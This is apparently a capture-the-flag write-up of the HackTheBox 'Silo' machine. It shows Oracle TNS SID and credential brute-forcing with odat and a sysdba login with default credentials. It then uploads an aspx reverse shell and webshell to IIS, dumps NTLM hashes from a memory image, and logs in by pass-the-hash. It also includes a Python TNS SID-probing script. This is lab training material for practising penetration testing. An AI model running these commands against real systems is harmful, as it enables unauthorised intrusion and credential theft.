# HackTheBox - Silo Writeup

###### tags: `writeup` `Silo` `Machine` `medium` `OSCP` `Volatility` `Oracle TNS Listener`

## :computer: Port Scanning

##### Nmap command

```bash
nmap -sV -T4 -sS -v -sC -p- -oN Ports 10.10.10.82
```

```bash
# Nmap 7.92 scan initiated Thu May  5 06:28:23 2022 as: nmap -sV -T4 -sS -v -sC -p- -oN Ports 10.10.10.82
Increasing send delay for 10.10.10.82 from 0 to 5 due to 2935 out of 7337 dropped probes since last increase.
Increasing send delay for 10.10.10.82 from 5 to 10 due to 11 out of 19 dropped probes since last increase.
Warning: 10.10.10.82 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.82
Host is up (0.068s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 58s, deviation: 0s, median: 58s
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode:
|   3.0.2:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2022-05-05T10:48:55
|_  start_date: 2022-05-05T10:23:23

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May  5 06:48:00 2022 -- 1 IP address (1 host up) scanned in 1177.15 seconds
```

We can see an IIS server and a less common service, an Oracle TNS listener on 1521, so let's look into that. Two other details from the scan matter later: SMB on 445 is open and message signing is "enabled but not required", which leaves the door open for pass-the-hash against a local administrator, and 49159 is a second TNS listener that wants a service name.

## :eye: Enumeration

The first thing I looked for was in [hacktricks](https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener), where I found some info about it: there's a tool called odat that retrieves info about this port with one command. To see how to use it I ran the help command, which lists all the modules:

![](https://i.imgur.com/KazhV3G.png)

In my case I launched the `all` option, which auto-enumerates the port by brute-forcing SIDs, then accounts and passwords against the SIDs it finds, and finally checks whether the instance is vulnerable to some known exploits.

```bash
odat all -s 10.10.10.82 -p 1521
```

After a few seconds I had the info needed to use the other modules:

![](https://i.imgur.com/QppfESL.png)

Now we know these things:

- SID is **XE**
- Username = **scott**
- Password = **tiger**

`scott`/`tiger` is Oracle's well-known demo account with its default password, which is why odat's wordlist finds it right away.

## :bomb: Exploitation

### TNS Listener Exploitation

Looking into the [wiki](https://github.com/quentinhardy/odat/wiki/all) page of the odat tool on GitHub, I saw that we can upload files to the IIS server, so I tried the following command to upload an aspx reverse shell.
```bash
odat dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile "c:\inetpub\wwwroot\\" shell.aspx /tmp/shell.aspx
```

But I got this error:

![](https://i.imgur.com/4PGx8lr.png)

The account obtained from odat does not have enough privileges to upload the file: the module writes files on the database server's filesystem through the `DBMS_XSLPROCESSOR` package, which needs privileges that `scott` doesn't have. After reading **hacktricks** and looking for more info I saw that we can log in as sysdba using Oracle's sqlplus client with the following command:

```bash
sqlplus <username>/<password>@<ip_address>/<SID> 'as sysdba'
```

```bash
sqlplus scott/tiger@10.10.10.82:1521/XE 'as sysdba'
```

This only works because `scott` has been granted SYSDBA on this box; a stock `scott` account would be refused with ORA-01031.

After logging into the DB we have to create a user with sysdba privileges so that we can upload files with odat without problems. I looked up the syntax on these two pages:

- https://dba.stackexchange.com/questions/40562/creating-an-admin-user-in-oracle
- https://www.oracletutorial.com/oracle-administration/oracle-create-user/

See the following image for how I created it.

![](https://i.imgur.com/6Lky32x.png)

Next we try to upload a file with the newly created account using odat. I have an aspx reverse shell ready for the IIS server, so I uploaded it to the root directory of the web server. Besides the reverse shell it is important to also upload a webshell, because a file we need later has an encoding problem and only displays properly when opened from the [webshell](https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx).

![](https://i.imgur.com/iUuOFgt.png)

![](https://i.imgur.com/ldRGzdz.png)

```bash
odat dbmsxslprocessor -s 10.10.10.82 -d XE -U pepe -P pepelu --putFile "c:\inetpub\wwwroot\\" shell2.aspx /tmp/shell.aspx
```

After uploading it successfully, start a netcat listener and load the shell in the browser.

```bash
rlwrap nc -nlvp 8888
```

![](https://i.imgur.com/KjBjIzz.png)

![](https://i.imgur.com/VzTu5BW.png)

With this we can read the user flag.
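Before moving on to root, a closer look at what odat's SID guessing in the enumeration step above actually does on the wire. The example below is added to this writeup and is not odat's own code: it builds a raw TNS CONNECT packet whose connect string names a candidate SID and classifies the listener's reply. A REFUSE packet carrying ORA-12505 means the listener does not know that SID (ORA-12514 is the same for a service name, which is what the second listener on 49159 wants); ACCEPT, RESEND or REDIRECT, or a REFUSE with any other error, mean the SID exists. The host, port and `XE` SID are the ones from the scan; the reply in `sample_refuse_packet` is constructed, not captured from Silo, and `probe_sid` is the only function that touches the network.

```python
"""Raw Oracle TNS CONNECT probe: the primitive behind odat's SID guessing.
Added example for this writeup, not odat's own code."""
import re
import socket
import struct

# TNS packet types we care about
TNS_CONNECT, TNS_ACCEPT, TNS_REFUSE, TNS_REDIRECT, TNS_RESEND = 1, 2, 4, 5, 11
_HEADER = ">HHBBH"             # length, packet checksum, type, flags, header checksum
_BODY = ">HHHHHHHHHHIBBII8s8s"  # CONNECT fields between the header and the connect string


def build_connect_packet(host: str, port: int, sid: str) -> bytes:
    """Build a TNS CONNECT packet whose CONNECT_DATA names the SID under test."""
    connect_data = (
        f"(DESCRIPTION=(CONNECT_DATA=(SID={sid})(CID=(PROGRAM=)(HOST=probe)(USER=)))"
        f"(ADDRESS=(PROTOCOL=TCP)(HOST={host})(PORT={port})))"
    ).encode()
    offset = struct.calcsize(_HEADER) + struct.calcsize(_BODY)  # 58: where the string starts
    body = struct.pack(
        _BODY,
        0x013A, 0x012C,             # protocol version 314, oldest compatible version 300
        0x0000, 0x0800, 0x7FFF,     # service options, SDU 2048, TDU 32767
        0x4F98, 0x0000, 0x0001,     # NT characteristics, max packets before ACK, byte-order marker
        len(connect_data), offset,  # connect-data length and offset
        0,                          # max receivable connect data
        0x41, 0x41,                 # connect flags 0 and 1
        0, 0,                       # trace cross-facility items
        b"\x00" * 8, b"\x00" * 8,   # trace unique connection id, unused
    )
    total = offset + len(connect_data)
    return struct.pack(_HEADER, total, 0, TNS_CONNECT, 0, 0) + body + connect_data


def classify_response(packet: bytes) -> dict:
    """Decide from the listener's reply whether the SID exists.

    ACCEPT/RESEND/REDIRECT: the listener recognised the SID and is handing off.
    REFUSE: the body is a '(DESCRIPTION=...(ERR=nnnnn)...)' string. ORA-12505 is
    'listener does not currently know of SID', ORA-12514 the same for SERVICE_NAME;
    any other code means the SID exists but the instance will not take us right now.
    """
    if len(packet) < struct.calcsize(_HEADER):
        raise ValueError("truncated TNS header")
    _length, _csum, ptype, _flags, _hcsum = struct.unpack(_HEADER, packet[:8])
    if ptype in (TNS_ACCEPT, TNS_RESEND, TNS_REDIRECT):
        return {"type": ptype, "sid_known": True, "err": None, "text": ""}
    if ptype == TNS_REFUSE:
        _user_reason, _sys_reason, dlen = struct.unpack(">BBH", packet[8:12])
        text = packet[12:12 + dlen].decode("ascii", errors="replace")
        m = re.search(r"\(ERR=(\d+)\)", text)
        err = int(m.group(1)) if m else None
        known = err is not None and err not in (12505, 12514)
        return {"type": ptype, "sid_known": known, "err": err, "text": text}
    return {"type": ptype, "sid_known": None, "err": None, "text": ""}


def probe_sid(host: str, port: int, sid: str, timeout: float = 5.0) -> dict:
    """Send one CONNECT and classify the answer. Network call; not exercised offline."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_connect_packet(host, port, sid))
        data = s.recv(8)
        length = struct.unpack(">H", data[:2])[0]
        while len(data) < length:
            chunk = s.recv(length - len(data))
            if not chunk:
                break
            data += chunk
        return classify_response(data)


def sample_refuse_packet(err: int = 12505) -> bytes:
    """Constructed REFUSE reply shaped like an 11.2 listener's 'unknown SID' answer (not a capture)."""
    text = (f"(DESCRIPTION=(TMP=)(VSNNUM=186647552)(ERR={err})"
            f"(ERROR_STACK=(ERROR=(CODE={err})(EMFI=4))))").encode()
    body = struct.pack(">BBH", 0x22, 0x00, len(text)) + text
    return struct.pack(_HEADER, struct.calcsize(_HEADER) + len(body), 0, TNS_REFUSE, 0, 0) + body


if __name__ == "__main__":
    # Offline demo against the constructed reply; swap in probe_sid("10.10.10.82", 1521, "XE") live.
    print(classify_response(sample_refuse_packet(12505)))
```

A wordlist-driven guesser is just `probe_sid` in a loop over candidate SIDs, keeping the ones where `sid_known` is true; the error code, not merely the packet type, is what distinguishes "no such SID" from "SID exists but the instance is blocked or starting up".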
![](https://i.imgur.com/F98HIgC.png)

---

### Root Privesc

Inside the user directory we can see the flag and a text file, let's read it.

![](https://i.imgur.com/Pug4tAU.png)

To read the text properly, open it from the webshell.

![](https://i.imgur.com/1yD3vcv.png)

If we click the link we get to a password-protected Dropbox file, let's use the password from the text:

![](https://i.imgur.com/xcgNNnk.png)

After entering the password we can download this zip file:

![](https://i.imgur.com/fECEwIZ.png)

Next we unzip it and find a .dmp file. Since the text file said it was a memory dump, we can use volatility3 to analyse it, but first we have to install it, so I leave you this [link](https://seanthegeek.net/1172/how-to-install-volatility-2-and-volatility-3-on-debian-ubuntu-or-kali-linux/) as a guide for volatility3.

There are a lot of modules in volatility, but looking into the [guide](https://volatility3.readthedocs.io/en/latest/index.html) I found one that dumps the local account hashes (it reads the SAM and SYSTEM hives out of the memory image). Here's the command to use with the file.

```bash
vol -f SILO-20180105-221806.dmp windows.hashdump
```

![](https://i.imgur.com/yuX15I0.png)

After that we have the stored hashes, and with these we can try to log in with pass-the-hash. No cracking is needed: the NT hash is unsalted and is exactly what NTLM authentication proves possession of, and the `aad3b435b51404eeaad3b435b51404ee` part is just the value for "no LM hash stored". Two things make this work here: SMB on 445 accepts NTLM, and the built-in Administrator (RID 500) is exempt from the remote UAC token filtering that would block other local admins. The dump's file name dates it to January 2018, so the hashes could have been rotated since, but the Administrator one is still valid.

```bash
pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 //10.10.10.82 cmd.exe
```

After that we are Administrator and we can read the root flag.

![](https://i.imgur.com/QyOljyf.png)

---

### You can find me on:

:bird: [**Twitter**](https://twitter.com/Aka_Mecanico) :desktop_computer: [**Github**](https://github.com/Mec4nico) :ballot_box_with_check: [**TryHackMe**](https://tryhackme.com/p/mech4nico) :green_book: [**HackTheBox**](https://www.hackthebox.eu/home/users/profile/336092)